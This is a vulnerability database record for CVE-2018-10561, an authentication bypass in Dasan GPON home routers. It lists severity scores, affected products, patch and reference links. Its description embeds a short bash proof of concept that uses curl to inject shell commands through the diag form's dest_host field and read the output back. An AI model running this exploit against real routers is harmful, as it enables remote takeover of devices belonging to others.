Details of VAR-201805-0262

ID

VAR-201805-0262

CVE

CVE-2018-10561

TITLE

Dasan GPON home router Authentication vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2018-004885

DESCRIPTION

An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home router Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit the vulnerability by bypassing the vulnerability by adding \342\200\230?images\342\200\231 to any of the device's URLs. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash echo "[+] Sending the Commanda| " # We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waitinga|." sleep 3 echo "[+] Retrieving the ouputa|." curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga

Trust: 2.7

sources: NVD: CVE-2018-10561 // JVNDB: JVNDB-2018-004885 // CNVD: CNVD-2018-09230 // BID: 107053 // VULHUB: VHN-120333 // VULMON: CVE-2018-10561 // PACKETSTORM: 147482

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2018-09230

AFFECTED PRODUCTS

vendor:	dasannetworks	model:	gpon router	scope:	eq	version:	-	Trust: 1.6
vendor:	dasan	model:	gpon routers	scope:	-	version:	-	Trust: 0.8
vendor:	dasan	model:	networks gpon	scope:	-	version:	-	Trust: 0.6
vendor:	dasan	model:	networks gpon router	scope:	eq	version:	0	Trust: 0.3

sources: CNVD: CNVD-2018-09230 // BID: 107053 // JVNDB: JVNDB-2018-004885 // CNNVD: CNNVD-201805-189 // NVD: CVE-2018-10561

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2018-10561
value:	CRITICAL
Trust: 1.0
NVD:	CVE-2018-10561
value:	CRITICAL
Trust: 0.8
CNVD:	CNVD-2018-09230
value:	HIGH
Trust: 0.6
CNNVD:	CNNVD-201805-189
value:	CRITICAL
Trust: 0.6
VULHUB:	VHN-120333
value:	HIGH
Trust: 0.1
VULMON:	CVE-2018-10561
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2018-10561
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
CNVD:	CNVD-2018-09230
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-120333
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2018-10561
baseSeverity:	CRITICAL
baseScore:	9.8
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	3.9
impactScore:	5.9
version:	3.0
Trust: 1.8

sources: CNVD: CNVD-2018-09230 // VULHUB: VHN-120333 // VULMON: CVE-2018-10561 // JVNDB: JVNDB-2018-004885 // CNNVD: CNNVD-201805-189 // NVD: CVE-2018-10561

PROBLEMTYPE DATA

problemtype:

CWE-287

Trust: 1.9

sources: VULHUB: VHN-120333 // JVNDB: JVNDB-2018-004885 // NVD: CVE-2018-10561

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201805-189

TYPE

authorization issue

Trust: 0.6

sources: CNNVD: CNNVD-201805-189

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-004885

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-120333 // VULMON: CVE-2018-10561

PATCH

title:	Top Page	url:	http://www.dasannetworks.com/en/	Trust: 0.8
title:	GPONHomeRouters security bypass vulnerability patch	url:	https://www.cnvd.org.cn/patchInfo/show/128597	Trust: 0.6
title:	Dasan GPON Home router security vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79885	Trust: 0.6
title:	Brocade Security Advisories: BSA-2018-603	url:	https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories&qid=b192ae1777abead866cbeb7d8a56bb12	Trust: 0.1
title:	GPON	url:	https://github.com/manyunya/GPON	Trust: 0.1
title:	GPON	url:	https://github.com/ethicalhackeragnidhra/GPON	Trust: 0.1
title:	CVE-2018-10562	url:	https://github.com/ATpiu/CVE-2018-10562	Trust: 0.1
title:	GPON-home-routers-Exploit	url:	https://github.com/vhackor/GPON-home-routers-Exploit	Trust: 0.1
title:	GPON	url:	https://github.com/f3d0x0/GPON	Trust: 0.1
title:	GPON	url:	https://github.com/Truongnn92/GPON	Trust: 0.1
title:	underattack-py	url:	https://github.com/underattack-today/underattack-py	Trust: 0.1
title:	Sniper	url:	https://github.com/samba234/Sniper	Trust: 0.1
title:	Kn0ck	url:	https://github.com/telnet22/Kn0ck	Trust: 0.1
title:	Sn1per	url:	https://github.com/unusualwork/Sn1per	Trust: 0.1
title:	Sn1per	url:	https://github.com/oneplus-x/Sn1per	Trust: 0.1
title:	api.greynoise.io	url:	https://github.com/GreyNoise-Intelligence/api.greynoise.io	Trust: 0.1
title:	Exp101tsArchiv30thers	url:	https://github.com/nu11secur1ty/Exp101tsArchiv30thers	Trust: 0.1
title:	awesome-cve-poc_qazbnm456	url:	https://github.com/xbl3/awesome-cve-poc_qazbnm456	Trust: 0.1
title:	PoC-in-GitHub	url:	https://github.com/hectorgie/PoC-in-GitHub	Trust: 0.1
title:	CVE-POC	url:	https://github.com/0xT11/CVE-POC	Trust: 0.1
title:	PoC-in-GitHub	url:	https://github.com/nomi-sec/PoC-in-GitHub	Trust: 0.1
title:	Threatpost	url:	https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/	Trust: 0.1
title:	Threatpost	url:	https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/	Trust: 0.1
title:	Threatpost	url:	https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/	Trust: 0.1
title:	Threatpost	url:	https://threatpost.com/wicked-botnet-uses-passel-of-exploits-to-target-iot/132125/	Trust: 0.1
title:	BleepingComputer	url:	https://www.bleepingcomputer.com/news/security/gpon-routers-attacked-with-new-zero-day/	Trust: 0.1
title:	Threatpost	url:	https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/	Trust: 0.1

sources: CNVD: CNVD-2018-09230 // VULMON: CVE-2018-10561 // JVNDB: JVNDB-2018-004885 // CNNVD: CNNVD-201805-189

EXTERNAL IDS

db:	NVD	id:	CVE-2018-10561	Trust: 3.6
db:	EXPLOIT-DB	id:	44576	Trust: 3.2
db:	BID	id:	107053	Trust: 2.1
db:	JVNDB	id:	JVNDB-2018-004885	Trust: 0.8
db:	EXPLOITDB	id:	44576	Trust: 0.6
db:	CNVD	id:	CNVD-2018-09230	Trust: 0.6
db:	CNNVD	id:	CNNVD-201805-189	Trust: 0.6
db:	PACKETSTORM	id:	147482	Trust: 0.2
db:	VULHUB	id:	VHN-120333	Trust: 0.1
db:	VULMON	id:	CVE-2018-10561	Trust: 0.1

sources: CNVD: CNVD-2018-09230 // VULHUB: VHN-120333 // VULMON: CVE-2018-10561 // BID: 107053 // JVNDB: JVNDB-2018-004885 // PACKETSTORM: 147482 // CNNVD: CNNVD-201805-189 // NVD: CVE-2018-10561

REFERENCES

url:	https://www.exploit-db.com/exploits/44576/	Trust: 3.3
url:	http://www.securityfocus.com/bid/107053	Trust: 2.5
url:	https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/	Trust: 2.1
url:	https://nvd.nist.gov/vuln/detail/cve-2018-10561	Trust: 0.9
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10561	Trust: 0.8
url:	http://www.dasannetworks.com/en/	Trust: 0.3
url:	https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-603	Trust: 0.3
url:	https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-604	Trust: 0.3
url:	https://cwe.mitre.org/data/definitions/287.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://github.com/manyunya/gpon	Trust: 0.1
url:	https://github.com/atpiu/cve-2018-10562	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2018-10562	Trust: 0.1

CREDITS

None

Trust: 0.9

sources: BID: 107053 // CNNVD: CNNVD-201805-189

SOURCES

db:	CNVD	id:	CNVD-2018-09230
db:	VULHUB	id:	VHN-120333
db:	VULMON	id:	CVE-2018-10561
db:	BID	id:	107053
db:	JVNDB	id:	JVNDB-2018-004885
db:	PACKETSTORM	id:	147482
db:	CNNVD	id:	CNNVD-201805-189
db:	NVD	id:	CVE-2018-10561

LAST UPDATE DATE

2024-08-14T15:13:10.839000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2018-09230	date:	2018-05-10T00:00:00
db:	VULHUB	id:	VHN-120333	date:	2019-03-04T00:00:00
db:	VULMON	id:	CVE-2018-10561	date:	2019-03-04T00:00:00
db:	BID	id:	107053	date:	2019-02-18T00:00:00
db:	JVNDB	id:	JVNDB-2018-004885	date:	2018-06-29T00:00:00
db:	CNNVD	id:	CNNVD-201805-189	date:	2019-02-25T00:00:00
db:	NVD	id:	CVE-2018-10561	date:	2019-03-04T18:39:11.630

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2018-09230	date:	2018-05-10T00:00:00
db:	VULHUB	id:	VHN-120333	date:	2018-05-04T00:00:00
db:	VULMON	id:	CVE-2018-10561	date:	2018-05-04T00:00:00
db:	BID	id:	107053	date:	2019-02-18T00:00:00
db:	JVNDB	id:	JVNDB-2018-004885	date:	2018-06-29T00:00:00
db:	PACKETSTORM	id:	147482	date:	2018-05-04T00:32:22
db:	CNNVD	id:	CNNVD-201805-189	date:	2018-05-07T00:00:00
db:	NVD	id:	CVE-2018-10561	date:	2018-05-04T03:29:00.227